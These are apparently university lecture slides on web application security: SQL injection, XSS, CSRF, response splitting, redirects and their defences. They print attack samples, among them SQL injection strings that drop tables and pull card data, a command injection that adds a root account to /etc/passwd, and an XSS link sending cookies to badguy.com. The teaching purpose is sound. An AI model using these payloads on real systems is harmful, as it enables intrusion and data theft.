0% found this document useful (0 votes)
64 views123 pages

Chapter 8 - Web Security

The document discusses secure web site design, focusing on ethical hacking practices and common vulnerabilities such as SQL injection and cross-site scripting (XSS). It highlights the importance of secure coding practices and outlines the OWASP Top 10 Security Vulnerabilities, emphasizing the need for input validation and proper error handling. Additionally, it provides examples of SQL injection attacks and their potential consequences.

Uploaded by

humaira shazwin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
64 views123 pages

Chapter 8 - Web Security

The document discusses secure web site design, focusing on ethical hacking practices and common vulnerabilities such as SQL injection and cross-site scripting (XSS). It highlights the importance of secure coding practices and outlines the OWASP Top 10 Security Vulnerabilities, emphasizing the need for input validation and proper error handling. Additionally, it provides examples of SQL injection attacks and their potential consequences.

Uploaded by

humaira shazwin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
You are on page 1/ 123

CS 155 Spring 2008

Secure Web Site Design

Collected Material

1
Ethics
• Only hack into sites you own
– Or you have permission
• Popular sites may have bug bounty
program
– Facebook
– github
– Google
• You will get caught
Tech
• HTTP
• HTML
• CSS
• JavaScript
• SQL
• Server-Side Code (Python/PHP/Ruby)
Many Vulnerabilities
• Cross-Site Scripting (XSS)
• SQL Injection
• Cross-Site Request Forgery (XSRF)
• HTTP Parameter Pollution (HPP)
• Command Injection
• Parameter Manipulation
• File Exposure
• Directory Traversal
• Forced Browsing
• Logic Flaws
• Execution After Redirect (EAR)
Tech
• HTTP
• HTML
• CSS
• JavaScript
• SQL
• Server-Side (Python/PHP/Ruby)
HTML
• Original HTML had
– images
– tables
– font sizes
–…
• Content was static
https://web.archive.org/web/19961017235908/http://www2.yahoo.com/
https://web.archive.org/web/19961022174810/http://www.altavista.com/
https://web.archive.org/web/19981202230410/http://www.google.com/
HTML Design
• HTML designed to describe a text
document with hyperlinks to other
documents
• How to do fancy animations or pretty web
pages?
Interactive HTML
• Java Applets
– Your computer downloads java bytecode from a random
website and runs it
• What could possibly go wrong?
• ActiveX Controls
– Binary, OS-specific programs that are downloaded and
executed in the context of a web page
• Adobe Flash
– Fundamentally a vector graphics and animation engine
• Silverlight
– Microsoft competitor and replacement/upgrade to ActiveX
• JavaScript
– Lingua franca of the web
JavaScript
• Code can be embedded into HTML pages using the script element and
(optionally storing the code in HTML comments)
<script>
<!--
var name = prompt('Please enter your name below.', '');
if (name == null) {
document.write('Welcome to my site!');
}
else {
document.write('Welcome to my site ' + name + '!');
}
-->
</script>

<script type="text/javascript">
<script language="javascript">
DOM Example
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>DOM Example</title>
</head>
<body>
<h1>DOM Example</h1>
<div id='insert_here'>
</div>
</body>
<script>
var hr = document.createElement('HR');

document.getElementById('insert_here').appendChild(hr);
</script>
</html>
Web Applications

HTTP SQL
Web Applications

HTTP SQL

JavaScrip
t
Web Applications

HTTP SQL

JavaScrip
t
HTTP Client Request
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: www.facebook.com
Accept: */*
HTTP Server Response
HTTP/1.1 200 OK
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Set-Cookie: datr=cohyVEAwQmq5jJh2cWZ9pZc9; expires=Wed, 23-Nov-2016 01:22:58 GMT;
Max-Age=63072000; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0;
path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fwww.facebook.com%2F; path=/;
domain=.facebook.com
Set-Cookie: reg_fb_gate=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fwww.facebook.com%2F; path=/;
domain=.facebook.com
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head>
<script>
...
</script>
<title id="pageTitle">Welcome to Facebook - Log In, Sign Up or Learn More</title>
JavaScript Security
• Browsers are downloading and running foreign
(JavaScript) code, sometimes concurrently
• The security of JavaScript code execution is
guaranteed by a sandboxing mechanism (similar
to what we saw in Java applets)
– No access to local files
– No access to (most) network resources
– No incredibly small windows
– No access to the browser's history
– …
• The details of the sandbox depend on the browser
Web application code
Runs on web server or app server.
 Takes input from web users (via web server)

 Interacts with the database and 3 rd parties.

 Prepares results for users (via web server)

Examples:
 Shopping carts, home banking, bill pay, tax

prep, …
 New code written for every web site.

Written in:
 C, PHP, Perl, Python, JSP, ASP, …

 Often written with little consideration for security

27
Common vulnerabilities
SQL Injection
 Browser sends malicious input to server

 Bad input checking leads to malicious SQL query


Sans
Top XSS – Cross-site scripting
10  Bad web site sends innocent victim a script that

steals information from an honest web site


CSRF – Cross-site request forgery
 Bad web site sends request to good web site,

using credentials of an innocent victim who


“visits” site
Other problems
 HTTP response splitting, site redirects, …

28
OWASP Top 10 Security Vulnerabilities
• 1 - Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web
browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's
browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
• 2 - Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when
user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the
interpreter into executing unintended commands or changing data.
• 3 - Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and
data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP,
XML and any framework which accepts filenames or files from users.
• 4 - Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an
internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.
Attackers can manipulate those references to access other objects without authorization.
• 5 - Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated
request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the
benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
• 6 - Information Leakage and Improper Error Handling Applications can unintentionally leak information about their
configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this
weakness to steal sensitive data, or conduct more serious attacks.
• 7 - Broken Authentication and Session Management Account credentials and session tokens are often not properly
protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.
• 8 - Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and
credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.
• 9 - Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary to protect
sensitive communications.
• 10 - Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the
display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized
operations by accessing those URLs directly.

29
OWASP Top 2: Injection Flaws (SQL Injection)

– What is SQL Injection


• SQL injection is the actual injection of SQL commands into web
applications through user input fields.
• When an application uses internal SQL commands and you also
have user input capabilities (like a login screen), SQL commands
can be injected that can create, read, update, or delete any data
available to the application.
– Prevention
• You can put tight constraints on user inputs. But the best method
of preventing SQL injection is to avoid the use of dynamically
generated SQL in your code. Instead use stored or canned
procedures.
• And then again, run a scan to make sure your application is not
vulnerable to SQL injections.

30
SQL Injection

with many slides from Neil Daswani

31
Dynamic Web Application
GET / HTTP/1.0
Browser
Web
server
HTTP/1.1 200 OK

index.php

Database
server

32
PHP: Hypertext
Preprocessor
Server scripting language with C-like syntax
Can intermingle static HTML and code
<input value=<?php echo $myvalue; ?
>>
Can embed variables in double-quote strings
$user = “world”; echo “Hello $user!”;
or $user = “world”; echo “Hello” .
$user . “!”;
Form data in global arrays $_GET, $_POST, …

33
SQL
Widely used database query language
Fetch a set of records
SELECT * FROM Person WHERE
Username=‘grader’
Add data to the table
INSERT INTO Person (Username, Zoobars)
VALUES (‘grader’, 10)
Modify data
UPDATE Person SET Zoobars=42 WHERE
PersonID=5
Query syntax (mostly) independent of
34
In context of project 2 …
Sample PHP
$recipient = $_POST[‘recipient’];
$sql = "SELECT PersonID FROM Person WHERE
Username='$recipient'";
$rs = $db->executeQuery($sql);
Problem
 What if ‘recipient’ is malicious string

that changed the meaning of the


query?

35
Basic picture: SQL
Injection
Victim Server
s f o rm
u
tm alicio
1 pos

2
unintende
3 receive valuable d query
Attacker data

Victim SQL DB
36
CardSystems Attack
CardSystems
 credit card payment processing company
 SQL injection attack in June 2005
 put out of business

The Attack
 263,000 credit card #s stolen from database
 credit card #s stored unencrypted
 43 million credit card #s exposed

37
April 2008 SQL
Vulnerabilities
Main steps in this attack
Use Google to find sites using a particular ASP
style vulnerable to SQL injection
Use SQL injection on these sites to modify the
page to include a link to a Chinese site
nihaorr1.com
Don't visit that site yourself!
The site (nihaorr1.com) serves Javascript that
exploits vulnerabilities in IE, RealPlayer, QQ
Instant Messenger

Steps (1) and (2) are automated in a tool that can be


configured to inject whatever you like into vulnerable sites
There is some evidence that hackers may get paid for each
visit to nihaorr1.com 39
Part of the SQL attack
string
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b
where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,
['+@C+']))+'‘ ''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
%20AS%20NVARCHAR(4000));EXEC(@S);-- 40
SQL Injection Examples
Type 1 Attack Example

Enter
Username
& SELECT passwd
Web Password FROM USERS
Web WHERE uname
Browser DB
Server IS ‘$username’
(Client)

Attacker will modify


SQL Injection Examples

42
SQL Injection Examples

43
SQL Injection Examples
Enter
Username
& SELECT passwd
Web Password FROM USERS
Web WHERE uname
Browser DB
Server IS ‘smith’
(Client)

Normal
Query
SQL Injection Examples

Attacker Modifies Input

45
SQL Injection Examples
Malicious Query
Enter
Username SELECT passwd
& FROM USERS
Web Password WHERE uname
Web
Browser DB
Server IS ‘’; DROP TABLE
(Client) USERS; -- ‘

Eliminates all
user accounts
What is SQL Injection?
Input Validation Vulnerability
 untrusted user input in SQL query to back-end
database
 without sanitizing the data

Specific case of more general command


injection
 inserting untrusted input into a query or command

Why Bad?
 supplied data can be misinterpreted as a
command
 could alter the intended effect of command or
query

47
SQL Injection Examples

View pizza order history:<br>


<form method="post" action="...">
Month
<select>
<option name="month" value="1">Jan</option>
...
<option name="month" value="12">Dec</option>
</select>
Year
<p>
<input type=submit name=submit value=View>
</form>

Attacker can post form that is not generated by this page.

48
SQL Injection Examples
Norma SELECT pizza, toppings, quantity, order_day
FROM orders
l WHERE userid=4123
SQL AND order_month=10
Query
Type 2 For order_month parameter, attacker could input
Attack
WHERE condition
0 OR 1=1 is always true!
Gives attacker access
to other users’
Maliciou … private data!
s WHERE userid=4123
AND order_month=0 OR 1=1
Query
49
SQL Injection Examples

All User Data


Compromised

50
SQL Injection Examples
A more damaging breach of user privacy:
For order_month parameter, attacker could input
0 AND 1=0
UNION SELECT cardholder, number, exp_month, exp_year
FROM creditcards

Attacker is able to
 Combine the results of two queries

 Empty table from first query with the

sensitive credit card info of all users from


second query

51
SQL Injection Examples

Credit Card Info


Compromised

52
More Attacks
• Create new users:
‘; INSERT INTO USERS (‘uname’,’passwd’,
‘salt’) VALUES (‘hacker’,’38a74f’, 3234);

• Password reset:
‘; UPDATE USERS SET
[email protected] WHERE
[email protected]
Second-Order SQL
Injection
Second-Order SQL Injection: attack where
data stored in database is later used to
conduct SQL injection

Example: this vulnerability could exist if


string escaping is applied inconsistently

Solution: Treat ALL parameters as dangerous

UPDATE USERS SET passwd='cracked'


WHERE uname='admin' --' attacker chooses
username 'admin' --
Strings not escaped!

54
Preventing SQL Injection
Input validation
 Filter

 Apostrophes, semicolons, percent symbols,


hyphens, underscores, …
 Any character that has special meanings
 Check the data type (e.g., make sure it’s an integer)

Whitelisting
 Blacklisting chars doesn’t work

 forget to filter out some characters


 could prevent valid input (e.g. username O’Brien)
 Allow only well-defined set of safe values

 Set implicitly defined through regular expressions


Escaping Quotes
For valid string inputs like username o’connor,
use escape characters
 Ex: escape(o’connor) = o’’connor
 only works for string inputs

56
Prepared Statements
Metacharacters (e.g. ‘) in queries provide
distinction between data & control
Most attacks: data interpreted as control /
alters the semantics of a
query/cmd
Bind Variables: ? placeholders guaranteed to be
data (not control)
Prepared Statements allow creation of static
queries with bind variables → preserves the
structure of intended query

57
Prepared
Statement:Example

PreparedStatement ps =
db.prepareStatement("SELECT pizza, toppings, quantity, order_day
+ "FROM orders WHERE userid=? AND order_month=?
ps.setInt(1, session.getCurrentUserId());
ps.setInt(2, Integer.parseInt(request.getParamenter("month")));
ResultSet res = ps.executeQuery();
Bind Variable:
Data
Placeholder
• query parsed w/o parameters
• bind variables are typed e.g. int, string, etc…*
Parameterized SQL
Build SQL queries by properly escaping args: ′  \′

Example: Parameterized SQL: (ASP.NET 1.1)


 Ensures SQL arguments are properly escaped.

SqlCommand cmd = new SqlCommand(


"SELECT * FROM UserTable WHERE
username = @User AND
password = @Pwd", dbConnection);
cmd.Parameters.Add("@User", Request[“user”] );
cmd.Parameters.Add("@Pwd", Request[“pwd”] );
cmd.ExecuteReader();

59
Mitigating Impacts
Prevent Schema & Information Leaks

Limit Privileges (Defense-in-Depth)

Encrypt Sensitive Data stored in Database

Harden DB Server and Host OS

Apply Input Validation

60
Other command injection
Example: PHP server-side code for sending
email
$email = $_POST[“email”]
$subject = $_POST[“subject”]
system(“mail $email –s $subject < /tmp/joinmynetwork”)

Attacker can post


http://yourdomain.com/mail.pl?
[email protected]&
subject=foo < /usr/passwd; ls

OR
http://yourdomain.com/mail.pl?
[email protected]&subject=foo;
echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
Cross Site Scripting (XSS)
OWASP Top 1: Cross Site Scripting
– What is Cross Site Scripting?
• In it’s simplest form, it’s a process that can occur anywhere a web application
uses input from a malicious user to generate output without validating or
encoding the input.
• During a Cross Site Scripting attack, a malicious source sends a script that is
executed by the end user’s browser. It allows attackers to embed code from
one webpage into another webpage by changing its HTML code .
• It’s been used to deface web sites, conduct phishing attacks, or it can take over
a user’s browser and force them to execute commands they’re unaware of .
• Cross Site Scripting attacks usually come in the form of JavaScript however,
any active content poses a potential danger .
– Prevention
• Validate the users input against what is expected
• Encode user supplied output
• After you believe you’ve done the right things during code development,
inspect your code with a scan.

63
Basic picture: Cross-site
scripting
Attack Server
w e b site
1 visit age
u s p
m a licio
ve
2recei le d ata
v a lu ab
d
5 se n

3
User Victim clic
4 k on
l
ech ink
o us
er i Server Victim
np u
t

64
The setup
User input is echoed into HTML response.

Example: search field


 http://victim.com/search.php ? term =
apple
 search.php responds with:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>

Is this exploitable? 65
Bad input
Consider link: (properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(
“http://badguy.com?cookie = ” +
document.cookie ) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> …
</script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
66
So what?
Why would user click on such a link?
 Phishing email in webmail client (e.g. gmail).
 Link in doubleclick banner ad
… many many ways to fool user into clicking

What if badguy.com gets cookie for


victim.com ?
 Cookie can include session auth for
victim.com
 Or other data intended only for victim.com
 Violates same origin policy 67
Much worse …
Attacker can execute arbitrary scripts in
browser

Can manipulate any DOM component on


victim.com
 Control links on page

 Control form fields (e.g. password field) on

this page and linked pages.


 Example: MySpace.com phishing attack
injects password field that sends password
to bad guy.

Can infect other users: MySpace.com worm. 68


MySpace.com (Samy worm)

Users can post HTML on their pages


 MySpace.com ensures HTML contains no
<script>, <body>, onclick, <a href=javascript://>
 … but can do Javascript within CSS tags:
<div style=“background:url(‘javascript:alert(1)’)”>
And can hide “javascript” as “java\nscript”

With careful javascript hacking:


 Samy’s worm: infects anyone who visits an
infected MySpace page … and adds Samy as a
friend.
 http://namb.la/popular/tech.html
Samy had millions of friends within 24 hours.
69
Defenses needed at server
Attack Server
w e b site
1 visit age
u s p
m a licio
ve
2recei le d ata
v a lu ab
d
5 se n

3
User Victim clic
4 k on
l
ech ink
o us
er i Server Victim
np u
t

70
Avoiding XSS bugs (PHP)

Main problem:
 Input checking is difficult --- many ways to inject

scripts into HTML.


Preprocess input from user before echoing it
PHP: htmlspecialchars(string)
&  &amp; "  &quot; '  &#039; <
 &lt; >  &gt;

 htmlspecialchars(
"<a href='test'>Test</a>", ENT_QUOTES);
Outputs:
&lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;

71
Avoiding XSS bugs (ASP.NET)

ASP.NET 1.1:
 Server.HtmlEncode(string)
 Similar to PHP htmlspecialchars

 validateRequest: (on by default)


 Crashes page if finds <script> in POST
data.
 Looks for hardcoded list of patterns.

 Can be disabled:
 <%@ Page
validateRequest=“false" %> 72
73
httpOnly Cookies (IE)

GET …
Browser
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
HttpOnly

• Cookie sent over HTTP(s), but not accessible to scripts


• cannot be read via document.cookie
• Helps prevent cookie theft via XSS

… but does not stop most other risks of XSS bugs.

74
Cross-Site Scripting (XSS)
• XSS attacks are used to bypass
JavaScript's Same Origin Policy
XSS – Example
<html>
<body>
<p>Hello <?= $name ?></p>
</body>
</html>
http://example.com/test.php?name=adam

<html>
<body>
<p>Hello <?= $name ?
></p>
</body>
</html>
http://example.com/test.php?name=adam

<html>
<body>
<p>Hello adam</p>
</body>
</html>
http://example.com/test.php?name=adam

<html>
<body>
<p>Hello adam</p>
</body>
</html>
http://example.com/test.php?name=<script>alert(‘xss’)</
script>

<html>
<body>
<p>Hello <?= $name ?
></p>
</body>
</html>
http://example.com/test.php?name=<script>alert(‘xss’)</
script>

<html>
<body>
<p>Hello
<script>alert(‘xss’)</script>
</p>
</body>
</html>
http://example.com/test.php?name=<script>alert(‘xss’)</
script>

<html>
<body>
<p>Hello
<script>alert(‘xss’)</script
>
</p>
</body>
</html>
XSS – Prevention
• XSS is very difficult to prevent
• Every piece of data that is returned to the user
and that can be influenced by the inputs to the
application must first be sanitized (GET
parameters, POST parameters, Cookies, request
headers, database contents, file contents)
• Specific languages (e.g., PHP) often provide
routines to prevent the introduction of code
– Sanitization has to be performed differently
depending on where the data is used
– This context-sensitivity of sanitization has been
studied by the research community

86
XSS – Prevention
• Sanitize all user inputs using known
sanitization routine

• Depends on where output is in HTML


page
– < and > necessary in HTML
– Only need ‘ in JavaScript
Cross Site Request Forgery
Basic picture
Server Victim

e s s ion
tab lish s
1 es
q u e st
e dr e
o r g
s e n df
4

2 v
isit
3 se r v
User Victim rec er
e
pag ive ma
e licio Attack Server
us

Q: how long do you stay logged on to Gmail?


89
Recall: session using
cookies
Browser Server
POST/login
.cgi

: au th e n ti cator
Set-cookie

GET…
Cookie:
authentic
ator

r e sp o n se
http://example.com/test.php?name=
http://example.com/test.php?name=

HTTP
Reflected XSS

JavaScrip
t
http://example.com/test.php?title=

SQL
HTTP SQL
Stored XSS

JavaScrip
t
Exploits – Phishing
• Malicious JavaScript can completely
control the DOM

• Change current page to login page where


the login sends credentials to the attacker
Exploits – Session Theft
• HTTP is session-less
– No HTTP-native way to tie requests to the
same user
• Web applications typically use cookies to
create a session
– Session describes who the user is, if they’ve
passed authentication
• JavaScript has access to cookies…
Exploits – Session Theft

HTTP SQL

JavaScrip
t
Exploits – Unauthorized Actions
• JavaScript can make requests to the web
application
– Browser sends cookies
– Appears as if the user made the request
(clicked the link or filled out the form)
• Malicious JavaScript can make requests to
the web application on your behalf
JavaScrip
t
Exploits – Worms
• Stored XSS vulnerability + Unauthorized
Actions
– Self-propagating worm

• Social networks particularly susceptible


– “samy is my hero” (2005)
– Tweetdeck (2014)
http://samy.pl/popular/
http://samy.pl/popular/
http://samy.pl/popular/
Cross Site Request Forgery
(XSRF)
Example:
 User logs in to bank.com. Does not sign off.
 Session cookie remains in browser state

 Then user visits another site containing:


<form name=F
action=http://bank.com/BillPay.php>
<input name=recipient value=badguy> …
<script> document.F.submit(); </script>
 Browser sends user auth cookie with request

 Transaction will be fulfilled

Problem:
 cookie auth is insufficient when side effects can
Another example: Home
Routers
[SRJ’07]
Fact:
 50% of home users use a broadband router with a

default or no password
Drive-by Pharming attack: User visits malicious site
 JavaScript at site scans home network looking for

broadband router:
• SOP allows “send only” messages
• Detect success using onerror:
 <IMG SRC=192.168.0.1 onError = do() >
 Once found, login to router and change DNS server
Problem: “send-only” access is sufficient to reprogram
router
106
CSRF Defenses
Secret token
 Place nonce in page/form from honest site
 Check nonce in POST
 Confirm part of ongoing session with server
 Token in POST can be HMAC of session ID in
cookie
Check referer (sic) header
 Referer header is provided by browser, not
script
 Unfortunately, often filtered for privacy reasons
Use custom headers via XMLHttpRequest
 This requires global change in server apps 107
Login CSRF
Referer header filtering
CSRF Recommendations
Login CSRF
 Strict Referer validation
 Login forms typically submit over HTTPS, not
blocked
HTTPS sites, such as banking sites
 Use strict Referer validation to protect against CSRF
Other
 Use Ruby-on-Rails or other framework that
implements secret token method correctl y
Future
 Alternative to Referer with fewer privacy problems
 Send only on POST, send only necessary data

110
More server-side problems
HTTP Response Splitting
Site Redirects
HTTP Response Splitting: The
setup
User input echoed in HTTP header.

Example: Language redirect page (JSP)


<% response.redirect(“/by_lang.jsp?lang=” +
request.getParameter(“lang”) ) %>

Browser sends http://.../by_lang.jsp ? lang=french


Server HTTP Response:
HTTP/1.1 302 (redirect)
Date: …
Location: /by_lang.jsp ? lang=french

Is this exploitable?
112
Bad input

Suppose browser sends:

http://.../by_lang.jsp ? lang=
“ french \n
Content-length: 0 \r\n\r\n
HTTP/1.1 200 OK
Spoofed page ” (URL encoded)

113
Bad input
HTTP response from server looks like:

HTTP/1.1 302 (redirect)


Date: …
Location: /by_lang.jsp ? lang= french
Content-length: 0
lang

HTTP/1.1 200 OK
Content-length: 217

Spoofed page

114
So what?
What just happened:
 Attacker submitted bad URL to victim.com

 URL contained spoofed page in it


 Got back spoofed page

So what?
 Cache servers along path now store spoof of

victim.com
 Will fool any user using same cache server

Defense: don’t do that (use URL encoding…)

115
Redirects
EZShopper.com shopping cart (10/2004):
http://…/cgi-bin/ loadpage.cgi ? page=url
 Redirects browser to url

Redirects are common on many sites


 Used to track when user clicks on external link

 EZShopper uses redirect to add HTTP headers

Problem: phishing
http://victim.com/cgi-bin/loadpage ?
page=phisher.com
 Link to victim.com puts user at phisher.com
 Local redirects should ensure target URL is local 116
Sample phishing email
How does this lead to spoof
page?

Link displayed
 https://www.start.earthlink.net/track?billing.asp
Actual link in html email
 source:https://start.earthlink.net/track?
id=101fe84398a866372f999c983d8973e77438a9
93847183bca43d7ad47e99219a907871c773400b
8328898787762c&url=http://202.69.39.30/
snkee/billing.htm?session_id=8495...
Website resolved to
 http://202.69.39.30/snkee/billing.htm?
session_id=8495...
Additional solutions
Web Application Firewalls
Help prevent some attacks we discuss today:
• Cross site scripting

• SQL Injection

• Form field tampering

• Cookie poisoning
Sample products:
Imperva
Kavado Interdo
F5 TrafficShield
Citrix NetScaler
CheckPoint Web Intel

120
Code checking
Blackbox security testing services:
 Whitehatsec.com

Automated blackbox testing tools:


 Cenzic, Hailstorm
 Spidynamic, WebInspect

 eEye, Retina

Web application hardening tools:


 WebSSARI [WWW’04] : based on information
flow
 Nguyen-Tuong [IFIP’05] : based on tainting
121
OWASP Top 3: Malicious File Execution
– What is Malicious File Execution
• When Developers program applications to use input files provided by
the user and the bad guy is the one entering the file, a malicious file is
executed unknowingly, thus we have malicious file execution.
• Malicious file execution attacks can occur anytime the application
accepts filenames or files from a users.
• When these files are executed, they can be used to do just about
anything from stealing data to taking over the entire system.
– Prevention
• Strongly validate user input using "accept known good" as a strategy, or
isolate incoming files and check them legitimacy before executing
them.
• Disable certain PHP commands: I suggest that you visit the OWASP
website to see what commands to disable.

122
Tools
• Browser Developer Tools
• Wireshark
• Burp Proxy
• SQLMap
• OWASP Broken Web Apps Project
– https://www.owasp.org/index.php/
OWASP_Broken_Web_Applications_Project
• Google Gruyere
– https://google-gruyere.appspot.com/
Summary
SQL Injection
 Bad input checking allows malicious SQL query

 Known defenses address problem effectively

XSS – Cross-site scripting


 Problem stems from echoing untrusted input

 Difficult to prevent; requires care, testing, tools,


CSRF – Cross-site request forgery
 Forged request leveraging ongoing session

 Can be prevented (if XSS problems fixed)

Other server vulnerabilities


 Increasing knowledge embedded in frameworks,

tools, application development recommendations

You might also like